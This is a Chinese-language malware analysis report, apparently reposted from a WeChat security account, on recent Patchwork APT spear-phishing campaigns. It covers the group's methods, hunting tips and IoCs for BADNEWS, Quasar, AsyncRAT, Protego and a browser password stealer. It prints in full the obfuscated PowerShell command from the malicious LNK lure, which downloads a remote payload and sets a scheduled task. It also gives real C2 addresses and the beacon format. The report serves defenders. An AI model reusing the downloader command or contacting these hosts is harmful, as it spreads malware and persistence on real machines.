APT | Patchwork组织近期攻击活动分析

APT 4周前 admin
390 0 0

1.组织概述

Patchwork组织最早于2009年左右被发现,在2015年的攻击行动被国外安全厂商Cymmetria披露为Patchwork。主要攻击中国、巴基斯坦、孟加拉国等国家军工、外交、教育,科研机构等,窃密重要数据。该组织主要使用鱼叉式钓鱼攻击,附件为伪装为PDF的LNK恶意文件,通过脚本命令从远程C2服务器下载后续恶意程序,使用多种自研或开源的攻击套件,如,自研BADNEWS远控木马、开源QuasarRat远控木马、开源AsyncRat远控木马、商业Remcos RAT、开源NorthStarC2等。

2.组织TTPs

2.1 Patchwork组织近期攻击活动TTPs

初始访问

使用钓鱼邮件获得初始入口点。攻击者发送“xxx”为主题的钓鱼邮件,诱使受害者点击钓鱼链接下载压缩包,内含伪装为PDF的lnk文件。

检测规避

C2下载远控木马或加载器,利用内存直接加载shellcode、加密shellcode本地加载、加密shellcode远程加载、本地dll劫持等多种方式,加载自研BADNEWS远控木马、开源QuasarRat远控木马、开源AsyncRat远控木马,实现检测规避等目的

持久化

创建计划任务和系统自启动项目实现持久化,并下载后阶段样本。

数据窃取

下载多个远控木马,对目标进行深度控制。浏览器主密钥窃取工具,解密浏览器记录的密码,窃取重要数据。

2.2 猎捕策略

以下目录是否存在可疑文件

C:PublicC:ProgramDataC:ProgramDataMicrosoftDeviceSyncC:WindowsTasks

是否存在可疑计划任务

EdgeUpdateAdobeUpdatesxxxUpdate

是否存在外连可疑进程

rundll32.exenotepad.exexxx.txt

是否存在可疑下载流量

uri:*/latexcb71ni/vtyu89ni.bin*/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php

3.样本分析

APT | Patchwork组织近期攻击活动分析

3.1 下载器(PDF.lnk)  

    此次攻击的入口点,为伪装为PDF的Lnk恶意文件,作用为下载后续恶意载荷,目前附件下载链接失效。

文件名

功能

md5

IoC

xxx.pdf.lnk

钓鱼邮件下载的压缩包里的钓鱼lnk文件

/

biwef.rootranger.info 
siang.rootranger.info

    Lnk文件执行powershell命令,从C2地址rootranger.info下载pdf原文、远控木马、创建计划任务。

C:WindowsSystem32conhost.exe powershell $ProgressPreference = ‘SilentlyContinue’;i”w”r https://biwef.rootranger.info/kjwgdjg/euitug -OutFile C:UsersPublic187639.pdf;s”a”p”s C:UsersPublic187639.pdf;i”w”r https://siang.rootranger.info/eruksfjg/wruiowu -OutFile “C:UsersPublichal”;r”e”n -Path “C:UsersPublichal” -NewName “C:UsersPublicUpdate.exe”;c”p”i ‘C:UsersPublic187639.pdf’ -destination .;sch”ta”s”ks /c”r”e”a”te /S”c minute /T”n EdgeUpdate /t”r ‘C:UsersPublicUpdate’ /f;e”r”a”s”e

3.2 BADNEWS远控木马(Update.exe)   

文件名

功能

md5

IoC

Update.exe/hal

远控木马,核心payload为BADNEWS

563264668d396af415523e8232a8fc48

socialrg.info

     Update.exe为RUST语言编写,样本首先启动notepad.exe进程,利用APC向目标进程注入shellcode。

APT | Patchwork组织近期攻击活动分析

APT | Patchwork组织近期攻击活动分析

向目标地址注入shellcode。

APT | Patchwork组织近期攻击活动分析APT | Patchwork组织近期攻击活动分析

最终加载的解密后的shellcode为BADNEWS类型远控木马,样本首先创建互斥变量“RfmbFv8D”,避免因计划任务同时存在多个恶意进程。

APT | Patchwork组织近期攻击活动分析

拼接的字符串发送至攻击者C2服务器https://socialrg.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php。

uedf=h93RELMsSKb8CRsnEdin6AxfduawlAafSZskVbW4eTfmQwd8gVinOFPLM815jqeFekkCnD/HFvY9Jk2skPsp7w==#**#dSHXPP0JYsd3jE+uURPmWw==#**#t6xMpSWhBSCR6We7oY2FIQTSUDQWOa/XYgmV0WTBrMI=#**#z1IAvvzQCuWf6o+++2UD9Q==#**#SVtd9hRcPK+A/iHv53rqaE09Rae7YsrR64T2f2P932s=#**#dSHXPP0JYsd3jE+uURPmWw==uedf={UUID}#**#{出口IP地址}#**#{内网IP地址}#**#{用户名}#**#{操作系统版本}#**#{所属国家名称}

APT | Patchwork组织近期攻击活动分析

访问myexternalip.com/raw、api.ipify.org?format=csv、ifconfig.me/ip 获取IP地址

APT | Patchwork组织近期攻击活动分析APT | Patchwork组织近期攻击活动分析APT | Patchwork组织近期攻击活动分析

根据不同参数执行命令:

参数名

功能说明

3hdfghd1

读取指定文件,返回执行结果

3gjdfghj6

Shell命令执行,返回执行结果

3gnfm9

发送心跳包

3fgjfhg4

目录遍历,返回执行结果

3gnfjhk7

文件下载并执行

3ngjfng5

文件下载

3fghnbj2

屏幕截屏,返回执行结果

frgt45f

Shell命令执行,返回执行结果

3.3 Quasar远控木马(dpdata.dll)   

文件名

功能

md5

IoC

dpdata.dll

远控木马,核心payload为Quasar Client

466c6f54ca0aea2edc20a1ecc2dd15c1

74.119.193.8:1005
zhiming.ghshijie.com

样本启动后发送请求

https://zhiming.ghshijie.com/latexcb71ni/vtyu89ni.bin,下载核心payload

APT | Patchwork组织近期攻击活动分析

收到服务器发送的payload,payload使用base64编码。

APT | Patchwork组织近期攻击活动分析

Payload先进行一次base64解码。  

APT | Patchwork组织近期攻击活动分析

再进行一次base64解码,还原为最终shellcode。

APT | Patchwork组织近期攻击活动分析

为shellcode申请内存空间。

APT | Patchwork组织近期攻击活动分析

shellcode被加载

APT | Patchwork组织近期攻击活动分析

APT | Patchwork组织近期攻击活动分析

内存加载的shellcode为开源Quasar远控客户端。

APT | Patchwork组织近期攻击活动分析

Quasar客户端相关配置信息:

APT | Patchwork组织近期攻击活动分析

    使用AES-128-CBC解密函数:

APT | Patchwork组织近期攻击活动分析

加密的配置信息:

APT | Patchwork组织近期攻击活动分析

解密还原配置信息明文:

APT | Patchwork组织近期攻击活动分析

最终连接攻击者C2地址74.119.193.8:1005。

APT | Patchwork组织近期攻击活动分析

APT | Patchwork组织近期攻击活动分析

3.4 浏览器密钥窃密工具(dpdata.exe)   

文件名

功能

md5

IoC

dpdata.exe

浏览器密钥窃密工具

f923dcf4d2afdcf673bc0a045b585825

/

dpdata.exe为rust编译的浏览器密钥窃密工具,运行后本地生成passwords.json,记录浏览器用户名和密码。

APT | Patchwork组织近期攻击活动分析

2.5 加载器(winlogs.txt)  

文件名

功能

md5

IoC

winlogs.txt

加载器

f1eb8823478677ed6591589491aca4b9

/

Winlogs.txt为Golang语言编译样本。

APT | Patchwork组织近期攻击活动分析

启动参数C:ProgramDatawinlogs.txt  -f C:ProgramDatamvs.dat -t selfthread

Winlogs.txt解密mvs.dat后开启socket连接。

APT | Patchwork组织近期攻击活动分析

向C2地址172.81.62.199:8808直接发起socket连接,轮询8808、7707、6606直到连接成功。

APT | Patchwork组织近期攻击活动分析

3.6 Async远控木马(mvs.dat)  

文件名

功能

md5

IoC

mvs.dat

Payload文件,核心为AsyncClient

fef544eb056246846765c0b3fba2fec2

172.81.62.199:8808

172.81.62.199:7707

172.81.62.199:6606

    被混淆加密的payload,用于winlogs.txt解密后执行。

APT | Patchwork组织近期攻击活动分析

mvs.dat解密后为Async远控客户端,在内存中执行。

APT | Patchwork组织近期攻击活动分析

Dump内存中的AsyncClient。

APT | Patchwork组织近期攻击活动分析

AsyncClient为.NET程序。

APT | Patchwork组织近期攻击活动分析

每隔sleep 5秒向C2地址发起socket连接,直到连接为止。

APT | Patchwork组织近期攻击活动分析

解密Async客户端配置信息。

APT | Patchwork组织近期攻击活动分析

    AES-256-CBC解密函数。

APT | Patchwork组织近期攻击活动分析

加密的配置信息。

APT | Patchwork组织近期攻击活动分析

解密后的配置如下:

APT | Patchwork组织近期攻击活动分析

3.7 Protego远控木马(edputil.dll)  

文件名

功能

md5

IoC

edputil.dll

远控木马,核心payload为Protego

8d60920b9d287feb84638abd7ae7db71

mdridefys.info

edputil.dll内存加载.NET编译的Protego远控木马客户端。     APT | Patchwork组织近期攻击活动分析

创建互斥信号量kiuwqyergljkwef。

APT | Patchwork组织近期攻击活动分析

实现文件上传、命令执行等远控功能。

APT | Patchwork组织近期攻击活动分析

攻击者C2地址为

https://mdridefys.info/bIHTfcVHegEoMrv/WCcod7JY3zwUpDH.php

APT | Patchwork组织近期攻击活动分析

3.8 Quasar远控木马(python310.dll)  

文件名

功能

md5

IoC

python310.dll

远控木马,核心payload为Quasar Client

5e1c6167b1127747b7ba06fc8335112d

74.119.193.8:1005  
zhiming.ghshijie.com

样本启动后发送请求:

https://zhiming.ghshijie.com/latexcb71ni/vtyu89ni.bin

下载核心payload:

APT | Patchwork组织近期攻击活动分析

payload与dpdata.dll一致,为开源远控Quasar Client客户端。

APT | Patchwork组织近期攻击活动分析

外连C2地址74.119.193.8:1005。

APT | Patchwork组织近期攻击活动分析

IOC   

IOC类型

IOC

IP、Domain

172.81.62.199:8808

172.81.62.199:7707

172.81.62.199:6606

194.156.99.229:443

74.119.193.8:1005

zhiming.ghshijie.com

socialrg.info

mdridefys.info

MD5

563264668d396af415523e8232a8fc48

f923dcf4d2afdcf673bc0a045b585825

fef544eb056246846765c0b3fba2fec2

f1eb8823478677ed6591589491aca4b9

466c6f54ca0aea2edc20a1ecc2dd15c1

8d60920b9d287feb84638abd7ae7db71

5e1c6167b1127747b7ba06fc8335112d


原文始发于微信公众号(TahirSec):APT | Patchwork组织近期攻击活动分析

版权声明:admin 发表于 2024年9月7日 下午2:01。
转载请注明:APT | Patchwork组织近期攻击活动分析 | CTF导航

相关文章